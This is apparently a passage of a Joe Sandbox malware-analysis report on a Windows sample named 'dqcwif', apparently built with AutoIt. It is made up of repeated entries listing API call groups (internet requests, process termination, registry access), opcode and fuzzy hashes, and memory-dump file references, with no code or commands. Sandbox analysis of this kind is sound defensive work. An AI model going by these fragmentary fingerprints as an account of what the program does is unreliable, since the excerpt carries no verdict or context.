                                                                                                          • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2082702847-0
                                                                                                          • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                                          • Instruction ID: 6d4e1a99f95b73ac20a5b9771160ed1b74f5bb52832e1f557b47db35893cff5b
                                                                                                          • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                                          • Instruction Fuzzy Hash: 77214D21A09B4281EE599B68F4342F96290AF46FB4F140734EB7E867DEDF3CEC448600
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                                          • Instruction ID: 218077907452f2dada1c62a4ed4a1eaa8e8d65a60d8797494b722b73de16863d
                                                                                                          • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                                          • Instruction Fuzzy Hash: 7D11A035B15B0182EB08CF69A828429B6A5FB89FC1F148038CF1E87BDADE3DDC018700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 839392675-0
                                                                                                          • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                          • Instruction ID: c79f143a5a95c452cca4f5fdb9e35a748dfb06e27e2036260312205cbe9cb542
                                                                                                          • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                          • Instruction Fuzzy Hash: 8D018432A5474283EB109B15F824EA97361FF8AF95F445034CB0A46B99DF3CD4488B00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                          • String ID:
                                                                                                          • API String ID: 179993514-0
                                                                                                          • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                          • Instruction ID: dfb3af4a357eb563926d9138d9d0a7cdc610384c933f1f19f20a2625e860d5fc
                                                                                                          • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                          • Instruction Fuzzy Hash: B1F0CD20F1975643F7504B79A858EA95292BF89F45F845034D70E82BDADF3CD8848600
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                          • Instruction ID: 8b5f4dd83cf33181522b68fb8c1e72bf482cc1a1ec6dc8d87dbb0870d077f498
                                                                                                          • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                          • Instruction Fuzzy Hash: 8BF0C765A54A01C2D704DF7AD8644A96361FF89FA5B145131CE2E863FDCE3CD8D98300
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                          • String ID: NULL Pointer assignment
                                                                                                          • API String ID: 1653399731-2785691316
                                                                                                          • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                          • Instruction ID: 9338f66917610e285928d8811d9e5d8b50e5109024ffeb124fdae628fa79a23b
                                                                                                          • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                          • Instruction Fuzzy Hash: CBB19B32A04A418AE710DF69D4A01ED7BB0FB89B98F500135EF4D97B9ADF78E945CB40
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                          • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                          • Instruction ID: 5077c18429588b34e5ad9dafa71697ec957faa0cfdb6bd31901a294f00901ac2
                                                                                                          • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                          • Instruction Fuzzy Hash: 31915A26B08B4285EB10EF69D4A01ED3375EB4AF88B554436DF4D9779ADE78EC06C340
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 00007FF6B5B90EDB
                                                                                                            • Part of subcall function 00007FF6B5B90B90: CharUpperBuffW.USER32(?,?,00000001,00007FF6B5B90F61), ref: 00007FF6B5B90C6A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharForegroundUpperWindow
                                                                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                                          • API String ID: 3570115564-1994484594
                                                                                                          • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                          • Instruction ID: 675ee09804b9da7bf1c2fd11f6bb2ba0a565952e0b65dd4c6c62042a037217e7
                                                                                                          • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                          • Instruction Fuzzy Hash: 2A71AF12F09A4381FE659B6DD8312F962A1AF66F84F844031DB0EC669FEE7DED459300
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                          • API String ID: 3964851224-769500911
                                                                                                          • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                          • Instruction ID: 93892619113a72c18f59596c1406b97f24b8908d4e48cae54feeccb159935c09
                                                                                                          • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                          • Instruction Fuzzy Hash: 0041C322B19A5381EAE04F2D88651B9A3D1AB76FD0B544631DB5DC379FEE3DEC428700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: #$E$O
                                                                                                          • API String ID: 3215553584-248080428
                                                                                                          • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                          • Instruction ID: f23d60139d4238477e6d9d5d025c3b2064eeea6d7342be37d0021f47618dfa59
                                                                                                          • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                          • Instruction Fuzzy Hash: F0416D22A1965185EF598F29E8606ED22A4BF56F88F184031EF4D8779EDF38E841CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 3196045410-1173974218
                                                                                                          • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                          • Instruction ID: b23ca475c1379e92706b27a8093529406d7ca64f37c6a977c7b64808dc7ac1f0
                                                                                                          • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                          • Instruction Fuzzy Hash: 79415722A1869395EB60DB28D8511FD6760FF66B84F800135DB4D9369FDF28ED05C750
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 787153527-1403004172
                                                                                                          • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                                          • Instruction ID: 280e68c8ce9d6882f88481fb1036adf96b8a41ffbf35347d59396f1dfe4ef784
                                                                                                          • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                                          • Instruction Fuzzy Hash: 7F31D222A08B4386FA20DB19E8615F96360FB8AF80F445631DB5D8779BCF3CE906C711
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                          • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                          • Instruction ID: 338b408c2e8709dd3ad8233db6c77734c938f6526bb6014e6091046ddb2b52d0
                                                                                                          • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                          • Instruction Fuzzy Hash: 03319422A1CB4246FB609F19E464AEA6750FB86F80F585131EF4D97B5EDE3CD8028740
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                          • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                          • Instruction ID: 1a1f3011fa6cdcf0a98ca212cb42302c5658893210eb2c5d954c7a1cab671764
                                                                                                          • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                          • Instruction Fuzzy Hash: 4E3150326097C1CAE7608F28E464BAA33A0FB86B91F544139DB5947B99DF3CD844CF01
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                          • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                          • Instruction ID: 0db9a9cee5d223138d7ab7c6ee4ebd886fc52a58ef9361819e192faf5f05d7e2
                                                                                                          • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                          • Instruction Fuzzy Hash: 76F04421A19A4291EF549B19F4A46B963A0EF89F90F541035EB0F866AADF3CD845CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLasthtonsinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 2227131780-0
                                                                                                          • Opcode ID: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                                                                          • Instruction ID: 5e8d1cdc54fb45444c485c819e169ebdbdd54e65ba8ede2a2f8755a5add847e4
                                                                                                          • Opcode Fuzzy Hash: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                                                                          • Instruction Fuzzy Hash: 23A1B522A0868286DA24FB2AD8A16F96791FF86F94F404131DF4EC779FDE7DD9018710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3488606520-0
                                                                                                          • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                          • Instruction ID: 2ff256727965daa9d8f988dfa640b1e24e5aaee0f6d36f738dfbb3f5d00fbb84
                                                                                                          • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                          • Instruction Fuzzy Hash: 9A814F22B0869186EB14EF2AD4646ED27A4FB4AFD4F054035DF1DA779BCE79D801C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3451389628-0
                                                                                                          • Opcode ID: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                                                                          • Instruction ID: 26cf796607efcae09cc09ce7560306ecc47c6caafb29d9be7107cf2e337c31ed
                                                                                                          • Opcode Fuzzy Hash: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                                                                          • Instruction Fuzzy Hash: 46712B72B08A468AEB10DF69D0A13FD2770EB86B88F418131DB0D97A9BCF38D945C754
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
